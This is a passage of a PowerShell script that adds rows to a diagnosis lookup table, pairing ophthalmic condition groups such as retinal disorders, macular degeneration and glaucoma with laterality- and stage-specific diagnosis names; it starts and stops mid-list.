$DiagnosisList.Rows.Add("Retinal vasculitis","Retinal vasculitis, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal vasculitis","Retinal vasculitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal telangiectasis","Retinal telangiectasis, right eye") + $null = $DiagnosisList.Rows.Add("Retinal telangiectasis","Retinal telangiectasis, left eye") + $null = $DiagnosisList.Rows.Add("Retinal telangiectasis","Retinal telangiectasis, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal telangiectasis","Retinal telangiectasis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other intraretinal microvascular abnormalities","Other intraretinal microvascular abnormalities") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, unspecified","Retinopathy of prematurity, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, unspecified","Retinopathy of prematurity, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, unspecified","Retinopathy of prematurity, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, unspecified","Retinopathy of prematurity, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 0","Retinopathy of prematurity, stage 0, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 0","Retinopathy of prematurity, stage 0, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 0","Retinopathy of prematurity, stage 0, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 0","Retinopathy of prematurity, stage 0, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 1","Retinopathy of prematurity, stage 1, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 1","Retinopathy of prematurity, stage 1, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 1","Retinopathy of prematurity, stage 1, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 1","Retinopathy of prematurity, stage 1, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 2","Retinopathy of prematurity, stage 2, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 2","Retinopathy of prematurity, stage 2, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 2","Retinopathy of prematurity, stage 2, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 2","Retinopathy of prematurity, stage 2, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 3","Retinopathy of prematurity, stage 3, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 3","Retinopathy of prematurity, stage 3, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 3","Retinopathy of prematurity, stage 3, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 3","Retinopathy of prematurity, stage 3, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 4","Retinopathy of prematurity, stage 4, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 4","Retinopathy of prematurity, stage 4, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 4","Retinopathy of prematurity, stage 4, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 4","Retinopathy of prematurity, stage 4, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 5","Retinopathy of prematurity, stage 5, right eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 5","Retinopathy of prematurity, stage 5, left eye") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 5","Retinopathy of prematurity, stage 5, bilateral") + $null = $DiagnosisList.Rows.Add("Retinopathy of prematurity, stage 5","Retinopathy of prematurity, stage 5, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retrolental fibroplasia","Retrolental fibroplasia, right eye") + $null = $DiagnosisList.Rows.Add("Retrolental fibroplasia","Retrolental fibroplasia, left eye") + $null = $DiagnosisList.Rows.Add("Retrolental fibroplasia","Retrolental fibroplasia, bilateral") + $null = $DiagnosisList.Rows.Add("Retrolental fibroplasia","Retrolental fibroplasia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other non-diabetic proliferative retinopathy","Other non-diabetic proliferative retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other non-diabetic proliferative retinopathy","Other non-diabetic proliferative retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Other non-diabetic proliferative retinopathy","Other non-diabetic proliferative retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Other non-diabetic proliferative retinopathy","Other non-diabetic proliferative retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Degeneration of macula and posterior pole","Unspecified macular degeneration") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, right eye","Nonexudative age-related macular degeneration, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, right eye","Nonexudative age-related macular degeneration, right eye, early dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, right eye","Nonexudative age-related macular degeneration, right eye, intermediate dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, right eye","Nonexudative age-related macular degeneration, right eye, advanced atrophic without subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, right eye","Nonexudative age-related macular degeneration, right eye, advanced atrophic with subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, left eye","Nonexudative age-related macular degeneration, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, left eye","Nonexudative age-related macular degeneration, left eye, early dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, left eye","Nonexudative age-related macular degeneration, left eye, intermediate dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, left eye","Nonexudative age-related macular degeneration, left eye, advanced atrophic without subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, left eye","Nonexudative age-related macular degeneration, left eye, advanced atrophic with subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, bilateral","Nonexudative age-related macular degeneration, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, bilateral","Nonexudative age-related macular degeneration, bilateral, early dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, bilateral","Nonexudative age-related macular degeneration, bilateral, intermediate dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, bilateral","Nonexudative age-related macular degeneration, bilateral, advanced atrophic without subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, bilateral","Nonexudative age-related macular degeneration, bilateral, advanced atrophic with subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, unspecified eye","Nonexudative age-related macular degeneration, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, unspecified eye","Nonexudative age-related macular degeneration, unspecified eye, early dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, unspecified eye","Nonexudative age-related macular degeneration, unspecified eye, intermediate dry stage") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, unspecified eye","Nonexudative age-related macular degeneration, unspecified eye, advanced atrophic without subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Nonexudative age-related macular degeneration, unspecified eye","Nonexudative age-related macular degeneration, unspecified eye, advanced atrophic with subfoveal involvement") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, right eye","Exudative age-related macular degeneration, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, right eye","Exudative age-related macular degeneration, right eye, with active choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, right eye","Exudative age-related macular degeneration, right eye, with inactive choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, right eye","Exudative age-related macular degeneration, right eye, with inactive scar") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, left eye","Exudative age-related macular degeneration, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, left eye","Exudative age-related macular degeneration, left eye, with active choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, left eye","Exudative age-related macular degeneration, left eye, with inactive choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, left eye","Exudative age-related macular degeneration, left eye, with inactive scar") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, bilateral","Exudative age-related macular degeneration, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, bilateral","Exudative age-related macular degeneration, bilateral, with active choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, bilateral","Exudative age-related macular degeneration, bilateral, with inactive choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, bilateral","Exudative age-related macular degeneration, bilateral, with inactive scar") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, unspecified eye","Exudative age-related macular degeneration, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, unspecified eye","Exudative age-related macular degeneration, unspecified eye, with active choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, unspecified eye","Exudative age-related macular degeneration, unspecified eye, with inactive choroidal neovascularization") + $null = $DiagnosisList.Rows.Add("Exudative age-related macular degeneration, unspecified eye","Exudative age-related macular degeneration, unspecified eye, with inactive scar") + $null = $DiagnosisList.Rows.Add("Angioid streaks of macula","Angioid streaks of macula") + $null = $DiagnosisList.Rows.Add("Macular cyst, hole, or pseudohole","Macular cyst, hole, or pseudohole, right eye") + $null = $DiagnosisList.Rows.Add("Macular cyst, hole, or pseudohole","Macular cyst, hole, or pseudohole, left eye") + $null = $DiagnosisList.Rows.Add("Macular cyst, hole, or pseudohole","Macular cyst, hole, or pseudohole, bilateral") + $null = $DiagnosisList.Rows.Add("Macular cyst, hole, or pseudohole","Macular cyst, hole, or pseudohole, unspecified eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular degeneration","Cystoid macular degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular degeneration","Cystoid macular degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular degeneration","Cystoid macular degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Cystoid macular degeneration","Cystoid macular degeneration, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drusen (degenerative) of macula","Drusen (degenerative) of macula, right eye") + $null = $DiagnosisList.Rows.Add("Drusen (degenerative) of macula","Drusen (degenerative) of macula, left eye") + $null = $DiagnosisList.Rows.Add("Drusen (degenerative) of macula","Drusen (degenerative) of macula, bilateral") + $null = $DiagnosisList.Rows.Add("Drusen (degenerative) of macula","Drusen (degenerative) of macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Puckering of macula","Puckering of macula, right eye") + $null = $DiagnosisList.Rows.Add("Puckering of macula","Puckering of macula, left eye") + $null = $DiagnosisList.Rows.Add("Puckering of macula","Puckering of macula, bilateral") + $null = $DiagnosisList.Rows.Add("Puckering of macula","Puckering of macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Toxic maculopathy","Toxic maculopathy, right eye") + $null = $DiagnosisList.Rows.Add("Toxic maculopathy","Toxic maculopathy, left eye") + $null = $DiagnosisList.Rows.Add("Toxic maculopathy","Toxic maculopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Toxic maculopathy","Toxic maculopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Peripheral retinal degeneration","Unspecified peripheral retinal degeneration") + $null = $DiagnosisList.Rows.Add("Lattice degeneration of retina","Lattice degeneration of retina, right eye") + $null = $DiagnosisList.Rows.Add("Lattice degeneration of retina","Lattice degeneration of retina, left eye") + $null = $DiagnosisList.Rows.Add("Lattice degeneration of retina","Lattice degeneration of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Lattice degeneration of retina","Lattice degeneration of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Microcystoid degeneration of retina","Microcystoid degeneration of retina, right eye") + $null = $DiagnosisList.Rows.Add("Microcystoid degeneration of retina","Microcystoid degeneration of retina, left eye") + $null = $DiagnosisList.Rows.Add("Microcystoid degeneration of retina","Microcystoid degeneration of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Microcystoid degeneration of retina","Microcystoid degeneration of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Paving stone degeneration of retina","Paving stone degeneration of retina, right eye") + $null = $DiagnosisList.Rows.Add("Paving stone degeneration of retina","Paving stone degeneration of retina, left eye") + $null = $DiagnosisList.Rows.Add("Paving stone degeneration of retina","Paving stone degeneration of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Paving stone degeneration of retina","Paving stone degeneration of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Age-related reticular degeneration of retina","Age-related reticular degeneration of retina, right eye") + $null = $DiagnosisList.Rows.Add("Age-related reticular degeneration of retina","Age-related reticular degeneration of retina, left eye") + $null = $DiagnosisList.Rows.Add("Age-related reticular degeneration of retina","Age-related reticular degeneration of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Age-related reticular degeneration of retina","Age-related reticular degeneration of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Secondary pigmentary degeneration","Secondary pigmentary degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Secondary pigmentary degeneration","Secondary pigmentary degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Secondary pigmentary degeneration","Secondary pigmentary degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary pigmentary degeneration","Secondary pigmentary degeneration, unspecified eye") + $null = $DiagnosisList.Rows.Add("Secondary vitreoretinal degeneration","Secondary vitreoretinal degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Secondary vitreoretinal degeneration","Secondary vitreoretinal degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Secondary vitreoretinal degeneration","Secondary vitreoretinal degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary vitreoretinal degeneration","Secondary vitreoretinal degeneration, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hereditary retinal dystrophy","Unspecified hereditary retinal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary retinal dystrophy","Vitreoretinal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary retinal dystrophy","Pigmentary retinal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary retinal dystrophy","Other dystrophies primarily involving the sensory retina") + $null = $DiagnosisList.Rows.Add("Hereditary retinal dystrophy","Dystrophies primarily involving the retinal pigment epithelium") + $null = $DiagnosisList.Rows.Add("Retinal hemorrhage","Retinal hemorrhage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal hemorrhage","Retinal hemorrhage, right eye") + $null = $DiagnosisList.Rows.Add("Retinal hemorrhage","Retinal hemorrhage, left eye") + $null = $DiagnosisList.Rows.Add("Retinal hemorrhage","Retinal hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Separation of retinal layers","Unspecified separation of retinal layers") + $null = $DiagnosisList.Rows.Add("Central serous chorioretinopathy","Central serous chorioretinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Central serous chorioretinopathy","Central serous chorioretinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Central serous chorioretinopathy","Central serous chorioretinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Central serous chorioretinopathy","Central serous chorioretinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Serous detachment of retinal pigment epithelium","Serous detachment of retinal pigment epithelium, right eye") + $null = $DiagnosisList.Rows.Add("Serous detachment of retinal pigment epithelium","Serous detachment of retinal pigment epithelium, left eye") + $null = $DiagnosisList.Rows.Add("Serous detachment of retinal pigment epithelium","Serous detachment of retinal pigment epithelium, bilateral") + $null = $DiagnosisList.Rows.Add("Serous detachment of retinal pigment epithelium","Serous detachment of retinal pigment epithelium, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic detachment of retinal pigment epithelium","Hemorrhagic detachment of retinal pigment epithelium, right eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic detachment of retinal pigment epithelium","Hemorrhagic detachment of retinal pigment epithelium, left eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic detachment of retinal pigment epithelium","Hemorrhagic detachment of retinal pigment epithelium, bilateral") + $null = $DiagnosisList.Rows.Add("Hemorrhagic detachment of retinal pigment epithelium","Hemorrhagic detachment of retinal pigment epithelium, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified retinal disorders","Retinal edema") + $null = $DiagnosisList.Rows.Add("Other specified retinal disorders","Retinal ischemia") + $null = $DiagnosisList.Rows.Add("Other specified retinal disorders","Other specified retinal disorders") + $null = $DiagnosisList.Rows.Add("Unspecified retinal disorder","Unspecified retinal disorder") + $null = $DiagnosisList.Rows.Add("Retinal disorders in diseases classified elsewhere","Retinal disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Preglaucoma, unspecified","Preglaucoma, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Preglaucoma, unspecified","Preglaucoma, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Preglaucoma, unspecified","Preglaucoma, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Preglaucoma, unspecified","Preglaucoma, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, low risk","Open angle with borderline findings, low risk, right eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, low risk","Open angle with borderline findings, low risk, left eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, low risk","Open angle with borderline findings, low risk, bilateral") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, low risk","Open angle with borderline findings, low risk, unspecified eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, high risk","Open angle with borderline findings, high risk, right eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, high risk","Open angle with borderline findings, high risk, left eye") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, high risk","Open angle with borderline findings, high risk, bilateral") + $null = $DiagnosisList.Rows.Add("Open angle with borderline findings, high risk","Open angle with borderline findings, high risk, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anatomical narrow angle","Anatomical narrow angle, right eye") + $null = $DiagnosisList.Rows.Add("Anatomical narrow angle","Anatomical narrow angle, left eye") + $null = $DiagnosisList.Rows.Add("Anatomical narrow angle","Anatomical narrow angle, bilateral") + $null = $DiagnosisList.Rows.Add("Anatomical narrow angle","Anatomical narrow angle, unspecified eye") + $null = $DiagnosisList.Rows.Add("Steroid responder","Steroid responder, right eye") + $null = $DiagnosisList.Rows.Add("Steroid responder","Steroid responder, left eye") + $null = $DiagnosisList.Rows.Add("Steroid responder","Steroid responder, bilateral") + $null = $DiagnosisList.Rows.Add("Steroid responder","Steroid responder, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ocular hypertension","Ocular hypertension, right eye") + $null = $DiagnosisList.Rows.Add("Ocular hypertension","Ocular hypertension, left eye") + $null = $DiagnosisList.Rows.Add("Ocular hypertension","Ocular hypertension, bilateral") + $null = $DiagnosisList.Rows.Add("Ocular hypertension","Ocular hypertension, unspecified eye") + $null = $DiagnosisList.Rows.Add("Primary angle closure without glaucoma damage","Primary angle closure without glaucoma damage, right eye") + $null = $DiagnosisList.Rows.Add("Primary angle closure without glaucoma damage","Primary angle closure without glaucoma damage, left eye") + $null = $DiagnosisList.Rows.Add("Primary angle closure without glaucoma damage","Primary angle closure without glaucoma damage, bilateral") + $null = $DiagnosisList.Rows.Add("Primary angle closure without glaucoma damage","Primary angle closure without glaucoma damage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified open-angle glaucoma","Unspecified open-angle glaucoma, stage unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified open-angle glaucoma","Unspecified open-angle glaucoma, mild stage") + $null = $DiagnosisList.Rows.Add("Unspecified open-angle glaucoma","Unspecified open-angle glaucoma, moderate stage") + $null = $DiagnosisList.Rows.Add("Unspecified open-angle glaucoma","Unspecified open-angle glaucoma, severe stage") + $null = $DiagnosisList.Rows.Add("Unspecified open-angle glaucoma","Unspecified open-angle glaucoma, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, right eye","Primary open-angle glaucoma, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, right eye","Primary open-angle glaucoma, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, right eye","Primary open-angle glaucoma, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, right eye","Primary open-angle glaucoma, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, right eye","Primary open-angle glaucoma, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, left eye","Primary open-angle glaucoma, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, left eye","Primary open-angle glaucoma, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, left eye","Primary open-angle glaucoma, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, left eye","Primary open-angle glaucoma, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, left eye","Primary open-angle glaucoma, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, bilateral","Primary open-angle glaucoma, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, bilateral","Primary open-angle glaucoma, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, bilateral","Primary open-angle glaucoma, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, bilateral","Primary open-angle glaucoma, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, bilateral","Primary open-angle glaucoma, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, unspecified eye","Primary open-angle glaucoma, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, unspecified eye","Primary open-angle glaucoma, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, unspecified eye","Primary open-angle glaucoma, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, unspecified eye","Primary open-angle glaucoma, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Primary open-angle glaucoma, unspecified eye","Primary open-angle glaucoma, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, right eye","Low-tension glaucoma, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, right eye","Low-tension glaucoma, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, right eye","Low-tension glaucoma, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, right eye","Low-tension glaucoma, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, right eye","Low-tension glaucoma, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, left eye","Low-tension glaucoma, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, left eye","Low-tension glaucoma, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, left eye","Low-tension glaucoma, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, left eye","Low-tension glaucoma, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, left eye","Low-tension glaucoma, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, bilateral","Low-tension glaucoma, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, bilateral","Low-tension glaucoma, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, bilateral","Low-tension glaucoma, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, bilateral","Low-tension glaucoma, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, bilateral","Low-tension glaucoma, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, unspecified eye","Low-tension glaucoma, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, unspecified eye","Low-tension glaucoma, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, unspecified eye","Low-tension glaucoma, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, unspecified eye","Low-tension glaucoma, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Low-tension glaucoma, unspecified eye","Low-tension glaucoma, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, right eye","Pigmentary glaucoma, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, right eye","Pigmentary glaucoma, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, right eye","Pigmentary glaucoma, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, right eye","Pigmentary glaucoma, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, right eye","Pigmentary glaucoma, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, left eye","Pigmentary glaucoma, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, left eye","Pigmentary glaucoma, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, left eye","Pigmentary glaucoma, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, left eye","Pigmentary glaucoma, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, left eye","Pigmentary glaucoma, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, bilateral","Pigmentary glaucoma, bilateral, stage unspecified") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, bilateral","Pigmentary glaucoma, bilateral, mild stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, bilateral","Pigmentary glaucoma, bilateral, moderate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, bilateral","Pigmentary glaucoma, bilateral, severe stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, bilateral","Pigmentary glaucoma, bilateral, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, unspecified eye","Pigmentary glaucoma, unspecified eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, unspecified eye","Pigmentary glaucoma, unspecified eye, mild stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, unspecified eye","Pigmentary glaucoma, unspecified eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, unspecified eye","Pigmentary glaucoma, unspecified eye, severe stage") + $null = $DiagnosisList.Rows.Add("Pigmentary glaucoma, unspecified eye","Pigmentary glaucoma, unspecified eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, right eye","Capsular glaucoma with pseudoexfoliation of lens, right eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, right eye","Capsular glaucoma with pseudoexfoliation of lens, right eye, mild stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, right eye","Capsular glaucoma with pseudoexfoliation of lens, right eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, right eye","Capsular glaucoma with pseudoexfoliation of lens, right eye, severe stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, right eye","Capsular glaucoma with pseudoexfoliation of lens, right eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, left eye","Capsular glaucoma with pseudoexfoliation of lens, left eye, stage unspecified") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, left eye","Capsular glaucoma with pseudoexfoliation of lens, left eye, mild stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, left eye","Capsular glaucoma with pseudoexfoliation of lens, left eye, moderate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, left eye","Capsular glaucoma with pseudoexfoliation of lens, left eye, severe stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, left eye","Capsular glaucoma with pseudoexfoliation of lens, left eye, indeterminate stage") + $null = $DiagnosisList.Rows.Add("Capsular glaucoma with pseudoexfoliation of lens, bilateral","Capsular glaucoma with pseudoexfoliation of lens, bilateral, stage unspecified") + $null = 